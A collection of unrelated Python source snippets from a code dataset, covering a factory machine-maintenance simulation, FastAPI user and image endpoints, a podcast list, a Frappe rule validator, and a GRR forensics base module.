self.state_time[self.h_state] = steps
else:
self.h_state = 0
self.state_time = [0] * 4
else:
raise ValueError("We currently only support continuous transitions")
@property
def health(self):
return self.h_state, self.state_time[self.h_state]
def request_parts(self, n):
self.request_jobs = n
def recieve_parts(self, n):
self.anti_jobs = n
def register_m(self):
self.under_m = True
self.anti_jobs = 0
self.h_state = 3
self.request_jobs = 0
if self.m_cd == 0:
self.m_cd = max(1, math.floor(np.random.normal(12, 3)))
def proceed(self):
if not self.under_m:
self.deque = self.anti_jobs
self.anti_jobs = 0
self.request_jobs = 0
new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
if new_h_state != self.h_state:
self.h_tracker[self.h_state].append(self.state_time[self.h_state])
self.h_state = new_h_state
else:
self.m_cd -= 1
assert self.m_cd >= 0, 'self.m_cd value is {}'.format(self.m_cd)
self.deque = self.anti_jobs
if self.m_cd == 0:
self.under_m = False
new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
assert new_h_state != self.h_state, 'new state {} should be different from the original state {}'.format(new_h_state, self.h_state)
if new_h_state != self.h_state:
self.h_tracker[self.h_state].append(self.state_time[self.h_state])
self.h_state = new_h_state
if self.init_time_base:
self.counter = self.init_time_base
self.state_time = [0] * 4
self.restart += 1
@property
def valid_actions(self):
if not self.init_time_base:
if self.h_state == 3 or self.under_m:
valid_actions = [0., 0., 1.]
elif self.h_state == 0 or self.h_state == 1:
valid_actions = [1., 1., 1.]
elif self.h_state == 2:
valid_actions = [1., 1., 1.]
else:
raise ValueError("we are in wrong {} state".format(self.h_state))
else:
if self.counter == 0:
valid_actions = [0., 0., 1.]
else:
if self.h_state == 3 or self.under_m:
valid_actions = [0., 0., 1.]
elif self.h_state == 0 or self.h_state == 1:
valid_actions = [1., 1., 0.]
elif self.h_state == 2:
valid_actions = [1., 1., 1.]
else:
raise ValueError("we are in wrong {} state".format(self.h_state))
return valid_actions
@property
def cost(self):
if self.action == 0 and self.h_state != 3:
cost = self.COST[0]
# print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
elif self.action == 1 and self.h_state != 3:
cost = self.COST[1]
# print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
elif self.h_state == 3 and self.state_time[3] == 0:
cost = self.COST[-1]
if self.action == 0:
cost += self.COST[0]
# print('Agent {} took action {}, and breakdown, and incur {} cost'.format(self.id, self.action, cost))
elif self.action == 1:
cost += self.COST[1]
# print('Agent {} took action {}, and breakdown, and incur {} cost'.format(self.id, self.action, cost))
else:
raise ValueError('self.action cannot take {}, the current state time is {}, state is {}, m_cd is {}, under_m is {}'.format(self.action, self.state_time, self.h_state, self.m_cd, self.under_m))
elif self.action == 2:
cost = self.COST[2]
# print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
else:
raise ValueError("Our agent going to wrong state, action pair {}{}".format(self.h_state, self.action))
return cost
# class Machine():
# def __init__(self, id, T, cell_id, config, time_base=False):
# self.T = T
# self.id = id
# self.cell_id = cell_id
# self.under_m = False
# self.deque = 0
# self.anti_jobs = 0
# self.action = None
# self.m_cd = 0
# self.ACTION = config['actions']
# self.COST = config['costs']
# self.h_history = np.zeros_like(self.COST)
# self.restart = 0
# # self.h_tracker = [[],[],[],[]]
# self.init_h_state()
# self.init_time_base = time_base
# if time_base:
# self.counter = self.init_time_base
#
#
# def step(self, action):
# if action == 0:
# if self.init_time_base:
# self.counter -= 1
# assert self.h_state != 3
# self.action = action
# n = self.ACTION[self.action]
# self.request_parts(n)
# self.state_time[self.h_state] += 1
# elif action == 1:
# if self.init_time_base:
# self.counter -= 1
# assert self.h_state != 3
# self.action = action
# n = self.ACTION[self.action]
# self.request_parts(n)
# self.state_time[self.h_state] += 1
# elif action == 2:
# self.action = action
# self.request_parts(0)
# self.register_m()
# self.state_time[self.h_state] += 1
# else:
# raise ValueError('action [%d] is out of range'%action)
# self.h_history[self.h_state] += 1
#
# def init_h_state(self):
# if type(self.T) == Continue_Transition:
# self.h_state = random.randint(0, 3)
# steps = self.T.init_trans(self.h_state)
# self.state_time = [0] * 4
# self.state_time[self.h_state] = steps
# if self.h_state == 3:
# self.register_m()
# steps = random.randint(0, self.m_cd-1)
# self.m_cd -= steps
# self.state_time = [0] * 4
# self.state_time[self.h_state] = steps
# else:
# self.h_state = 0
# self.state_time = [0] * 4
#
# @property
# def health(self):
# return self.h_state, self.state_time[self.h_state]
#
# def request_parts(self, n):
# self.request_jobs = n
#
# def recieve_parts(self, n):
# self.anti_jobs = n
#
# def register_m(self):
# self.under_m = True
# self.anti_jobs = 0
# self.h_state = 3
# self.request_jobs = 0
# if self.m_cd == 0:
# self.m_cd = math.floor(np.random.normal(12, 3))
#
# def proceed(self):
# if not self.under_m:
# self.deque = self.anti_jobs
# self.anti_jobs = 0
# self.request_jobs = 0
# new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
# # if new_h_state != self.h_state:
# # self.h_tracker[self.h_state].append(self.state_time[self.h_state])
# self.h_state = new_h_state
# else:
# self.m_cd -= 1
# self.deque = self.anti_jobs
# if self.m_cd == 0:
# self.under_m = False
# new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
# # if new_h_state != self.h_state:
# # self.h_tracker[self.h_state].append(self.state_time[self.h_state])
# self.h_state = new_h_state
# if self.init_time_base:
# self.counter = self.init_time_base
# self.state_time = [0] * 4
# self.restart += 1
#
# @property
# def valid_actions(self):
# if self.h_state == 3 or self.under_m:
# valid_actions = [0., 0., 1.]
# else:
# if self.init_time_base:
# if self.counter == 0:
# valid_actions = [0., 0., 1.]
# valid_actions = [1] * 3
# return valid_actions
#
# @property
# def cost(self):
# if self.action == 0 and self.h_state != 3:
# cost = self.COST[0]
# # print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
# elif self.action == 1 and self.h_state != 3:
# cost = self.COST[1]
# # print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
# elif self.h_state == 3 and self.state_time[3] == 0:
# cost = self.COST[-1]
# if self.action == 0:
# cost += self.COST[0]
# # print('Agent {} took action {}, and breakdown, and incur {} cost'.format(self.id, self.action, cost))
# elif self.action == 1:
# cost += self.COST[1]
# # print('Agent {} took action {}, and breakdown, and incur {} cost'.format(self.id, self.action, cost))
# else:
# raise ValueError('self.action cannot take {}'.format(self.action))
# elif self.action == 2:
# cost = self.COST[2]
# # print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
# else:
# raise ValueError("Our agent going to wrong state, action pair {}{}".format(self.h_state, self.action))
# return cost
class Cell():
def __init__(self, id):
self.id = id
self.deque = 0
self.anti_jobs = 0
self.p_cell = None
self.f_cell = None
def add_machines(self, m_list):
self.machines = m_list
def add_cells(self, p_cell=None, f_cell=None):
self.p_cell = p_cell
self.f_cell = f_cell
if self.p_cell:
self.p_cell.f_cell = self
if self.f_cell:
self.f_cell.p_cell = self
def assign_jobs(self):
self.deque = 0
if not self.p_cell:
assert self.anti_jobs >= 0, 'anti_jobs {} should be always greater than 0'.format(self.anti_jobs)
recieve_requests = np.sum(list(map(lambda x: x.request_jobs, self.machines)))
self.anti_jobs += recieve_requests
for machine in self.machines:
machine.recieve_parts(machine.request_jobs)
assert self.anti_jobs >= np.sum(list(map(lambda x: x.anti_jobs, self.machines))), 'anti_jobs is {}, machines in cell {} actually get {}'.format(self.anti_jobs, self.id, np.sum(list(map(lambda x: x.anti_jobs, self.machines))))
if self.f_cell:
self.f_cell.anti_jobs += np.sum(list(map(lambda x: x.anti_jobs, self.machines)))
else:
if self.anti_jobs > 0:
recieve_requests = np.sum(list(map(lambda x: x.request_jobs, self.machines)))
if self.anti_jobs >= recieve_requests:
for machine in self.machines:
machine.recieve_parts(machine.request_jobs)
if self.f_cell:
self.f_cell.anti_jobs += np.sum(list(map(lambda x: x.anti_jobs, self.machines)))
else:
request_jobs = np.array(list(map(lambda x: x.request_jobs, self.machines)), dtype=np.float32)
jobs_pool = np.zeros_like(self.machines, dtype=np.float32)
while np.sum(request_jobs - jobs_pool) > 0:
p = (request_jobs - jobs_pool) / np.sum(request_jobs - jobs_pool)
idx = np.random.choice(len(self.machines), 1, p=p)[0]
jobs_pool[idx] += 1.
for idx, machine in enumerate(self.machines):
machine.recieve_parts(jobs_pool[idx])
if self.f_cell:
self.f_cell.anti_jobs += np.sum(list(map(lambda x: x.anti_jobs, self.machines)))
def proceed(self):
for m in self.machines:
m.proceed()
self.deque = np.sum(list(map(lambda x: x.deque, self.machines)))
self.anti_jobs -= self.deque
# assert self.anti_jobs >= 0, 'anti_jobs is {}, and deques is {}'.format(self.anti_jobs, self.deque)
@property
def buffer_size(self):
return self.anti_jobs
def reset(self):
self.deque = 0
self.anti_jobs = 0
class Simulation():
def __init__(self, map_name, time_base=False):
self._initialize(map_name, time_base)
def _initialize(self, map_name, time_base):
config = get_map_params(map_name)
cell_ids = config['cells']
machine_ids = config['machines']
self.sale_price = config['sale_price']
continuous = config['continuous_trans']
machine_ids = np.array(machine_ids).reshape([len(cell_ids), -1])
self.machines = []
self.cells = []
for i in range(machine_ids.shape[0]):
cell_id = i
self.cells.append(Cell(cell_id))
for j in range(machine_ids.shape[1]):
machine_id = machine_ids[i, j]
if not continuous:
transition = config['transitions'][i]
T = Transition(transition, schedule=False)
else:
T = Continue_Transition(config['dist'], config['first_params'], config['second_params'], config['lower_bounds'])
self.machines.append(Machine(machine_id, T, cell_id, config, time_base))
self.cells[-1].add_machines(self.machines[-machine_ids.shape[1]:])
if i > 0:
p_cell = self.cells[i-1]
self.cells[-1].add_cells(p_cell)
def reset(self, random_init_sim):
for cell in self.cells:
cell.reset()
random_list = [0] * len(self.machines)
if random_init_sim:
for ele in random_init_sim:
random_list[ele] = 1
for idx, machine in enumerate(self.machines):
machine.reset(random_list[idx])
def step(self, actions):
for idx, machine in enumerate(self.machines):
machine.step(actions[idx])
for cell in self.cells:
cell.assign_jobs()
for cell in self.cells:
cell.proceed()
def get_avail_agent_actions(self, agent_id):
return self.machines[agent_id].valid_actions
@property
def products(self):
final_cell = self.cells[-1]
products = final_cell.deque
return products
@property
def profit(self):
products = self.products
cost = np.sum(list(map(lambda x: x.cost, self.machines)))
return products * self.sale_price - cost
def get_buffers_agent(self, agent_id):
total_buffer = np.sum(list(map(lambda x:x.buffer_size, self.cells)))
if total_buffer == 0:
return 0., 0.
agent = self.machines[agent_id]
cell_id = agent.cell_id
front_buffer = self.cells[cell_id].buffer_size
following_buffer = 0
if cell_id + 1 < len(self.cells) -1:
following_buffer = self.cells[cell_id+1].buffer_size
return front_buffer / total_buffer, following_buffer / total_buffer
def get_cost_agent(self, agent_id):
return self.machines[agent_id].cost
if __name__ == '__main__':
from scenes import get_map_params
import matplotlib.pyplot as plt
import numpy as np
# These are the "Tableau 20" colors as RGB.
tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),
(44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),
(148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
(227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
(188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]
# Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts.
for i in range(len(tableau20)):
r, g, b = tableau20[i]
tableau20[i] = (r / 255., g / 255., b / 255.)
def pie_plot(*args, **kw_args):
labels = kw_args['labels']
colors = tableau20[:len(labels)]
sizes = args
def func(pct, allvals):
absolute = pct/100.*np.sum(allvals)
return "{:.1f}%\n({:.1f} unit time)".format(pct, absolute)
fig1, ax1 = plt.subplots()
ax1.pie(sizes, colors=colors, labels=labels, autopct=lambda pct:func(pct, sizes),
shadow=True, startangle=90)
ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
plt.show()
map_name = 263
profit = 0
sim = Simulation(map_name)
for i in range(20):
random_init_sim = list(np.random.choice(6, 3, replace=False))
# print(random_init_sim)
print("At iteration {}".format(i))
sim.reset(random_init_sim)
# sim.step([0]*6)
num = 0
while num < 64:
actions = []
for i in range(6):
action_p = np.array([1., 0., 0.])
valid_actions = sim.get_avail_agent_actions(i)
# print('valid_action is {}'.format(valid_actions))
action_p = np.array(valid_actions, dtype=np.float32) * (action_p + 1e-9)
p = action_p / np.sum(action_p)
# print('p is {}'.format(p))
action = np.random.choice(3, 1, p=p)[0]
actions.append(action)
sim.step(actions)
# print("Actions are {}".format(actions))
# print("States are {}".format([machine.h_state for machine in sim.machines]))
num += 1
# print(sim.profit)
profit += sim.profit
# cells = []
# for m in sim.machines:
# cells.append(m.h_history/m.restart)
# print("States history are {}".format(m.h_history/m.restart))
#
for i in range(4):
h = np.concatenate(list(map(lambda x:np.array(x.h_tracker[i]), sim.machines[:3])))
# if i == 1:
# print(h)
print("Health state %d has mean %.3f, std %.3f"%(i, np.mean(h), np.std(h)))
for i in range(4):
h = np.concatenate(list(map(lambda x:np.array(x.h_tracker[i]), sim.machines[3:])))
print("Health state %d has mean %.3f, std %.3f"%(i, np.mean(h), np.std(h)))
# print(np.mean(cells[3:], axis=0))
# #pie_plot(*list(np.mean(cells[3:], axis=0)),
# # **{'labels': ['pre-mature', 'mature', 'slightly-worn', 'severely-worn']})
print(profit)
| StarcoderdataPython |
3301193 | <reponame>TeamAbstract/GeneticScheduling
from util.timeUtil import *
from util.systemUtil import * | StarcoderdataPython |
3380717 | import logging
from ..exit import do_exit
logger = logging.getLogger("emulator")
event_id = -1
event_id_limit = 0
def next_event_id(uc):
global event_id
global event_id_limit
event_id += 1
if event_id_limit != 0 and event_id >= event_id_limit:
logger.info("[*] Event id limit reached, exiting")
do_exit(uc, 0)
return event_id
def set_trace_id_limit(limit):
global event_id_limit
event_id_limit = limit
| StarcoderdataPython |
1648998 | <gh_stars>0
import torch
a = torch.randn((3, 2048, 7, 7))
a = a.permute(2, 3, 0, 1)
a = a.view(-1, 3, 2048)
qry = a
attn = torch.nn.MultiheadAttention(2048, num_heads=1, dropout=0.2, kdim=85, vdim=85)
keys = torch.randn((50, 3, 85))
values = torch.randn((50, 3, 85))
# this is the class embeddings
# att = torch.randn((85, 50))
att = attn(qry, keys, values)
print()
| StarcoderdataPython |
73795 | from datetime import datetime
from fastapi.encoders import jsonable_encoder
from sqlalchemy.orm import Session
from app import crud
from app.core.security import verify_password
from app.models.domain import Domain
from app.models.event import Event
from app.models.user import User
from app.schemas.user import UserCreate, UserUpdate
from app.tests.utils.domain import create_random_domain
from app.tests.utils.event import create_random_page_view_event
from app.tests.utils.user import create_random_user
from app.tests.utils.utils import random_email, random_lower_string
def test_create_user(db: Session) -> None:
email = random_email()
password = <PASSWORD>()
user_in = UserCreate(email=email, password=password)
user = crud.user.create(db, obj_in=user_in)
assert user.email == email
assert hasattr(user, "hashed_password")
def test_authenticate_user(db: Session) -> None:
email = random_email()
password = <PASSWORD>()
user_in = UserCreate(email=email, password=password)
user = crud.user.create(db, obj_in=user_in)
authenticated_user = crud.user.authenticate(db, email=email, password=password)
assert authenticated_user
assert user.email == authenticated_user.email
def test_not_authenticate_user(db: Session) -> None:
email = random_email()
password = <PASSWORD>()
user = crud.user.authenticate(db, email=email, password=password)
assert user is None
def test_check_if_user_is_active(db: Session) -> None:
email = random_email()
password = <PASSWORD>()
user_in = UserCreate(email=email, password=password)
user = crud.user.create(db, obj_in=user_in)
is_active = crud.user.is_active(user)
assert is_active is True
def test_check_if_user_is_active_inactive(db: Session) -> None:
email = random_email()
password = <PASSWORD>_<PASSWORD>()
user_in = UserCreate(email=email, password=password, disabled=True)
user = crud.user.create(db, obj_in=user_in)
is_active = crud.user.is_active(user)
assert is_active
def test_check_if_user_is_superuser(db: Session) -> None:
email = random_email()
password = <PASSWORD>_<PASSWORD>()
user_in = UserCreate(email=email, password=password, is_superuser=True)
user = crud.user.create(db, obj_in=user_in)
is_superuser = crud.user.is_superuser(user)
assert is_superuser is True
def test_check_if_user_is_superuser_normal_user(db: Session) -> None:
username = random_email()
password = <PASSWORD>()
user_in = UserCreate(email=username, password=password)
user = crud.user.create(db, obj_in=user_in)
is_superuser = crud.user.is_superuser(user)
assert is_superuser is False
def test_get_user(db: Session) -> None:
password = <PASSWORD>()
username = random_email()
user_in = UserCreate(email=username, password=password, is_superuser=True)
user = crud.user.create(db, obj_in=user_in)
user_2 = crud.user.get(db, id=user.id)
assert user_2
assert user.email == user_2.email
assert jsonable_encoder(user) == jsonable_encoder(user_2)
def test_update_user(db: Session) -> None:
password = <PASSWORD>()
email = random_email()
user_in = UserCreate(email=email, password=password, is_superuser=True)
user = crud.user.create(db, obj_in=user_in)
new_password = <PASSWORD>()
user_in_update = UserUpdate(password=<PASSWORD>, is_superuser=True)
crud.user.update(db, db_obj=user, obj_in=user_in_update)
user_2 = crud.user.get(db, id=user.id)
assert user_2
assert user.email == user_2.email
assert verify_password(new_password, user_2.hashed_password)
def test_mark_deletion(db: Session):
user = create_random_user(db)
assert not user.delete_at
crud.user.mark_for_removal(db, user)
assert user.delete_at
def test_delete_pending_users(db: Session):
user = create_random_user(db)
domain = create_random_domain(db, owner_id=user.id)
event_id = create_random_page_view_event(db, domain=domain).id
user2 = create_random_user(db)
domain2 = create_random_domain(db, owner_id=user2.id)
event2_id = create_random_page_view_event(db, domain=domain2).id
domain_id = domain.id
user_id = user.id
user.delete_at = datetime.now()
db.commit()
crud.user.delete_pending_users(db)
assert not db.query(Domain).get(domain_id)
assert not db.query(User).get(user_id)
assert not db.query(Event).filter(Event.id == event_id).scalar()
assert db.query(Event).filter(Event.id == event2_id).scalar()
assert db.query(Domain).get(domain2.id)
assert db.query(User).get(user2.id)
| StarcoderdataPython |
131024 | <reponame>amcclead7336/Enterprise_Data_Science_Final<gh_stars>0
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .release_definition_environment_step import ReleaseDefinitionEnvironmentStep
class ReleaseDefinitionApprovalStep(ReleaseDefinitionEnvironmentStep):
"""ReleaseDefinitionApprovalStep.
:param id:
:type id: int
:param approver:
:type approver: :class:`IdentityRef <release.v4_0.models.IdentityRef>`
:param is_automated:
:type is_automated: bool
:param is_notification_on:
:type is_notification_on: bool
:param rank:
:type rank: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'approver': {'key': 'approver', 'type': 'IdentityRef'},
'is_automated': {'key': 'isAutomated', 'type': 'bool'},
'is_notification_on': {'key': 'isNotificationOn', 'type': 'bool'},
'rank': {'key': 'rank', 'type': 'int'}
}
def __init__(self, id=None, approver=None, is_automated=None, is_notification_on=None, rank=None):
super(ReleaseDefinitionApprovalStep, self).__init__(id=id)
self.approver = approver
self.is_automated = is_automated
self.is_notification_on = is_notification_on
self.rank = rank
| StarcoderdataPython |
59067 | # -*- coding: utf-8 -*-
# Copyright (c) 2021, Wongkar and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Rule(Document):
def validate(self):
frappe.msgprint("after_insert")
# manufacture = frappe.get_value("Rule",{"item_code": self.item_code,"type": "Manufacture"}, "item_code")
# if manufacture:
# frappe.throw("Disconut Manufature Item "+manufacture+" sudah ada !")
# dealer = frappe.get_value("Rule",{"item_code": self.item_code,"type": "Dealer"}, "item_code")
# if dealer:
# frappe.throw("Disconut Dealer Item "+dealer+" sudah ada !")
# main_dealer = frappe.get_value("Rule",{"item_code": self.item_code,"type": "Main Dealer"}, "item_code")
# if main_dealer:
# frappe.throw("Disconut Main Dealer Item "+main_dealer+" sudah ada !")
leasing = frappe.db.get_value("Rule",{"item_code": self.item_code, "besar_dp" : self.besar_dp, "tenor": self.tenor}, "item_code")
if leasing:
frappe.throw("Disconut Item "+leasing+" sudah ada !")
if self.type == "Leasing" and self.besar_dp == "":
frappe.throw("Masukkan besad DP !")
if self.type == "Leasing" and self.tenor == "":
frappe.throw("Masukkan besad Tenor !")
# biaya_penjualan_kendaraan = frappe.get_value("Rule",{"item_code": self.item_code,"type": "Biaya Penjualan Kendaraan"}, "item_code")
# if biaya_penjualan_kendaraan:
# frappe.throw("Disconut Biaya Penjualan Kendaraan Item "+biaya_penjualan_kendaraan+" sudah ada !")
| StarcoderdataPython |
23655 | """Returns words from the given paragraph which has been repeated most,
incase of more than one words, latest most common word is returned. """
import string
def mostCommonWord(paragraph: str) -> str:
# translate function maps every punctuation in given string to white space
words = paragraph.translate(str.maketrans(string.punctuation, ' '*len(string.punctuation)))
words = words.lower().split()
unique_words = {}
highest = 0
res = ''
for word in words:
if word not in unique_words:
unique_words[word] = 0
unique_words[word] += 1
if unique_words[word] >= highest:
highest = unique_words[word]
res = word
return res
print(mostCommonWord("HacktoberFest is live! Riddhi is participating in HACKtoBERfEST.Happy Coding.")) #Output: hacktoberfest | StarcoderdataPython |
109925 | from typing import List
from io import BytesIO
import numpy as np
from PIL import Image
from fastapi import FastAPI, Request, File, UploadFile
from fastapi.responses import HTMLResponse, StreamingResponse
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
app = FastAPI()
app.mount("/static", StaticFiles(directory="static"), name="static")
templates = Jinja2Templates(directory="templates")
@app.get('/', response_class=HTMLResponse)
async def read_root(request: Request):
return templates.TemplateResponse("index.html", {"request": request})
@app.post('/api/image-processing')
async def create_image_processing(files: List[UploadFile] = File(...)):
# open image
bytes_io = BytesIO(files[0].file.read())
image = Image.open(bytes_io).convert('RGB')
# image processing
data = np.array(image)
h, w, _ = data.shape
h = int(h // 2) * 2
w = int(w // 2) * 2
data = data[:h, :w, :] \
.reshape(h // 2, 2, w // 2, 2, -1) \
.transpose(1, 0, 3, 2, 4) \
.reshape(h, w, -1)
content = BytesIO()
Image.fromarray(data).save(content, format='png')
content.seek(0)
# response
return StreamingResponse(content, media_type='image/png')
| StarcoderdataPython |
10590 | <reponame>bopopescu/docker_images_a
class Check_Excessive_Current(object):
def __init__(self,chain_name,cf,handlers,irrigation_io,irrigation_hash_control,get_json_object):
self.get_json_object = get_json_object
cf.define_chain(chain_name, False )
#cf.insert.log("check_excessive_current")
cf.insert.assert_function_reset(self.check_excessive_current)
cf.insert.log("excessive_current_found")
cf.insert.send_event("IRI_CLOSE_MASTER_VALVE",False)
cf.insert.send_event( "RELEASE_IRRIGATION_CONTROL")
cf.insert.one_step(irrigation_io.disable_all_sprinklers )
cf.insert.wait_event_count( count = 15 )
cf.insert.reset()
self.handlers = handlers
self.irrigation_hash_control = irrigation_hash_control
def check_excessive_current(self,cf_handle, chainObj, parameters, event):
#print("check excessive current")
return False #TBD
| StarcoderdataPython |
22221 | """
List of podcasts and their filename parser types.
"""
from .rss_parsers import BaseItem, TalkPythonItem, ChangelogItem, IndieHackersItem
import attr
@attr.s(slots=True, frozen=True)
class Podcast:
name = attr.ib(type=str)
title = attr.ib(type=str)
url = attr.ib(type=str)
rss = attr.ib(type=str)
rss_parser = attr.ib(type=BaseItem)
PODCASTS = [
Podcast(
name="talkpython",
title="Talk Python To Me",
url="https://talkpython.fm",
rss="https://talkpython.fm/episodes/rss",
rss_parser=TalkPythonItem,
),
Podcast(
name="pythonbytes",
title="Python Bytes",
url="https://pythonbytes.fm/",
rss="https://pythonbytes.fm/episodes/rss",
rss_parser=TalkPythonItem,
),
Podcast(
name="changelog",
title="The Changelog",
url="https://changelog.com/podcast",
rss="https://changelog.com/podcast/feed",
rss_parser=ChangelogItem,
),
Podcast(
name="podcastinit",
title="Podcast.__init__",
url="https://www.podcastinit.com/",
rss="https://www.podcastinit.com/feed/mp3/",
rss_parser=BaseItem,
),
Podcast(
name="indiehackers",
title="Indie Hackers",
url="https://www.indiehackers.com/podcast",
rss="http://feeds.backtracks.fm/feeds/indiehackers/indiehackers/feed.xml",
rss_parser=IndieHackersItem,
),
Podcast(
name="realpython",
title="Real Python",
url="https://realpython.com/podcasts/rpp/",
rss="https://realpython.com/podcasts/rpp/feed",
rss_parser=BaseItem,
),
Podcast(
name="kubernetespodcast",
title="Kubernetes Podcast",
url="https://kubernetespodcast.com/",
rss="https://kubernetespodcast.com/feeds/audio.xml",
rss_parser=BaseItem,
),
]
PODCAST_MAP = {p.name: p for p in PODCASTS}
| StarcoderdataPython |
1623265 | <gh_stars>10-100
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class OrderSpec(object):
def __init__(self, buyType, pkgType, ipNum, bp, ep, returnUrl, id=None, name=None, timeSpan=None, timeUnit=None):
"""
:param buyType: 操作类型 1: 新购防护包, 3: 升级防护包
:param id: (Optional) 防护包实例 Id, 升级防护包实例时必传
:param name: (Optional) 防护包实例名称, 新购防护包时必传
长度限制为 1-80 个字符, 只允许包含中文, 字母, 数字, -, ., /, _
:param pkgType: 套餐类型, 1: 独享 IP, 2: 共享 IP
:param ipNum: 可防护 IP 数量, 5, 10, 50, 100 1000(不限)
:param bp: 保底带宽: 10, 20, 30, 50, 单位: Gbps
:param ep: 弹性带宽: 0, 10, 20, 单位: Gbps
:param timeSpan: (Optional) 购买防护包时长, 新购防护包时必传
- timeUnit 为 3 时, 可取值 1-9
- timeUnit 为 4 时, 可取值 1-3
:param timeUnit: (Optional) 购买时长类型, 新购防护包时必传
- 3: 月
- 4: 年
:param returnUrl: 回调 url
"""
self.buyType = buyType
self.id = id
self.name = name
self.pkgType = pkgType
self.ipNum = ipNum
self.bp = bp
self.ep = ep
self.timeSpan = timeSpan
self.timeUnit = timeUnit
self.returnUrl = returnUrl
| StarcoderdataPython |
1609557 | <filename>hello.py
from helper import greeting
greeting("hello") | StarcoderdataPython |
2215 | <reponame>RonaldoAPSD/Hedge
import Hedge
while True:
text = input('Hedge > ')
if text.strip() == "":
continue
result, error = Hedge.run('<stdin>', text)
if (error):
print(error.asString())
elif result:
if len(result.elements) == 1:
print(repr(result.elements[0]))
else:
print(repr(result)) | StarcoderdataPython |
3349812 | <reponame>hkhalifa/dftimewolf
"""Base GRR module class. GRR modules should extend it."""
from logging import Logger
import tempfile
import time
from typing import Optional, Union, Callable, List, Any
from grr_api_client import api as grr_api
from grr_api_client import errors as grr_errors
from grr_api_client.client import Client
from grr_api_client.flow import Flow
from grr_api_client.hunt import Hunt
from dftimewolf.lib.errors import DFTimewolfError
class GRRBaseModule(object):
"""Base module for GRR hunt and flow modules.
Attributes:
output_path (str): path to store collected artifacts.
grr_api: GRR HTTP API client.
grr_url: GRR HTTP URL.
reason (str): justification for GRR access.
approvers: list of GRR approval recipients.
"""
_CHECK_APPROVAL_INTERVAL_SEC = 10
def __init__(self) -> None:
"""Initializes a GRR hunt or flow module.
Args:
state (DFTimewolfState): recipe state.
name (Optional[str]): The module's runtime name.
critical (Optional[bool]): True if the module is critical, which causes
the entire recipe to fail if the module encounters an error.
"""
self.reason = str()
self.grr_api = None # type: grr_api.ApiClient
self.grr_url = str()
self.approvers = [] # type: List[str]
self.output_path = str()
# pylint: disable=arguments-differ
def GrrSetUp(
self,
reason: str,
grr_server_url: str,
grr_username: str,
grr_password: str,
approvers: Optional[str]=None,
verify: bool=True) -> None:
"""Initializes a GRR hunt result collector.
Args:
reason (str): justification for GRR access.
grr_server_url (str): GRR server URL.
grr_username (str): GRR username.
grr_password (str): GRR password.
approvers (Optional[str]): comma-separated GRR approval recipients.
verify (Optional[bool]): True to indicate GRR server's x509 certificate
should be verified.
"""
grr_auth = (grr_username, grr_password)
if approvers:
self.approvers = [item.strip() for item in approvers.split(',')]
self.grr_api = grr_api.InitHttp(api_endpoint=grr_server_url,
auth=grr_auth,
verify=verify)
self.grr_url = grr_server_url
self.output_path = tempfile.mkdtemp()
self.reason = reason
# TODO: change object to more specific GRR type information.
def _WrapGRRRequestWithApproval(
self,
grr_object: Union[Hunt, Client],
grr_function: Callable, # type: ignore[type-arg]
logger: Logger,
*args: Any,
**kwargs: Any
) -> Union[Flow, Hunt]:
"""Wraps a GRR request with approval.
This method will request the approval if not yet granted.
Args:
grr_object (object): GRR object to create the eventual approval on.
grr_function (function): GRR function requiring approval.
args (list[object]): Positional arguments that are to be passed
to `grr_function`.
kwargs (dict[str, object]): keyword arguments that are to be passed
to `grr_function`.
Returns:
object: return value of the execution of grr_function(*args, **kwargs).
Raises:
DFTimewolfError: If approvers are required but none were specified.
"""
approval_sent = False
approval_url = None
while True:
try:
return grr_function(*args, **kwargs)
except grr_errors.AccessForbiddenError as exception:
logger.info('No valid approval found: {0!s}'.format(exception))
# If approval was already sent, just wait a bit more.
if approval_sent:
logger.info('Approval not yet granted, waiting {0:d}s'.format(
self._CHECK_APPROVAL_INTERVAL_SEC))
logger.info(approval_url)
time.sleep(self._CHECK_APPROVAL_INTERVAL_SEC)
continue
# If no approvers were specified, abort.
if not self.approvers:
message = ('GRR needs approval but no approvers specified '
'(hint: use --approvers)')
raise DFTimewolfError(message, critical=True) from exception
# Otherwise, send a request for approval
approval = grr_object.CreateApproval(
reason=self.reason, notified_users=self.approvers)
approval_sent = True
approval_url = ('{0:s}/#/users/{1:s}/approvals/client/{2:s}/{3:s}'.
format(self.grr_url, approval.username,
approval.client_id,
approval.approval_id))
logger.info(
'{0!s}: approval request sent to: {1!s} (reason: {2:s})'.format(
grr_object, self.approvers, self.reason))
| StarcoderdataPython |
3396365 | class Foo:
